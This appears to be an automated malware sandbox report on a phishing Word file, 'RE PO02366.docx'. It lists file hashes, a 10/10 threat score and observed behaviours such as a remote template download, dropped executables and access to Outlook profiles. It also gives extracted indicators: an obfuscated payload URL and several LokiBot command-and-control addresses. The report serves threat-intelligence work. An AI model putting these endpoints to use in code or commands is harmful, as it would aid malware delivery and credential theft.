General
-
Target
RE PO02366.docx
-
Size
10KB
-
Sample
230222-xckkcseg61
-
MD5
352573ea247c865918062df15a57fd90
-
SHA1
69699e27cfc37916b60c5b63340c550f1750810d
-
SHA256
0fc64d847655fe5a6f90a06fbb2ca5f5e4848701c4f18c1d2cda39aca390952e
-
SHA512
8ef10f279da88da64d69d58843d875d4d922438e09eb3896a2392ebc91b1b9dcca27fa3acaba52cc2d0403c365dac139a583378cd4ecdcc41471e7227ad13f8b
-
SSDEEP
192:ScIMmtP0xfUW70vG/b3kgOi4OUdVuus+1pReDnc37yCdt:SPX+si10ni4OiVMyeDnMuCr
Static task
static1
Behavioral task
behavioral1
Sample
RE PO02366.docx
Resource
win10-20230220-en
Behavioral task
behavioral2
Sample
RE PO02366.docx
Resource
win7-20230220-en
Behavioral task
behavioral3
Sample
RE PO02366.docx
Resource
win10v2004-20230220-en
Malware Config
Extracted
http://QQZQQQQZZZZZQQQQQQQOOOOOQQQQQOOQOQOZZZOOOOOOOZZZZZOOOOOQOQQQOQOQOQOQOQOQOZZZOZOQQOQOQOQOQOQOZ@3235029245/OO-OO-OO.DOC
Extracted
lokibot
http://208.67.105.148/sung/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Targets
-
-
Target
RE PO02366.docx
-
Size
10KB
-
MD5
352573ea247c865918062df15a57fd90
-
SHA1
69699e27cfc37916b60c5b63340c550f1750810d
-
SHA256
0fc64d847655fe5a6f90a06fbb2ca5f5e4848701c4f18c1d2cda39aca390952e
-
SHA512
8ef10f279da88da64d69d58843d875d4d922438e09eb3896a2392ebc91b1b9dcca27fa3acaba52cc2d0403c365dac139a583378cd4ecdcc41471e7227ad13f8b
-
SSDEEP
192:ScIMmtP0xfUW70vG/b3kgOi4OUdVuus+1pReDnc37yCdt:SPX+si10ni4OiVMyeDnMuCr
Score10/10-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Abuses OpenXML format to download file from external location
-
Executes dropped EXE
-
Loads dropped DLL
-
Uses the VBS compiler for execution
-
Accesses Microsoft Outlook profiles
-
Suspicious use of SetThreadContext
-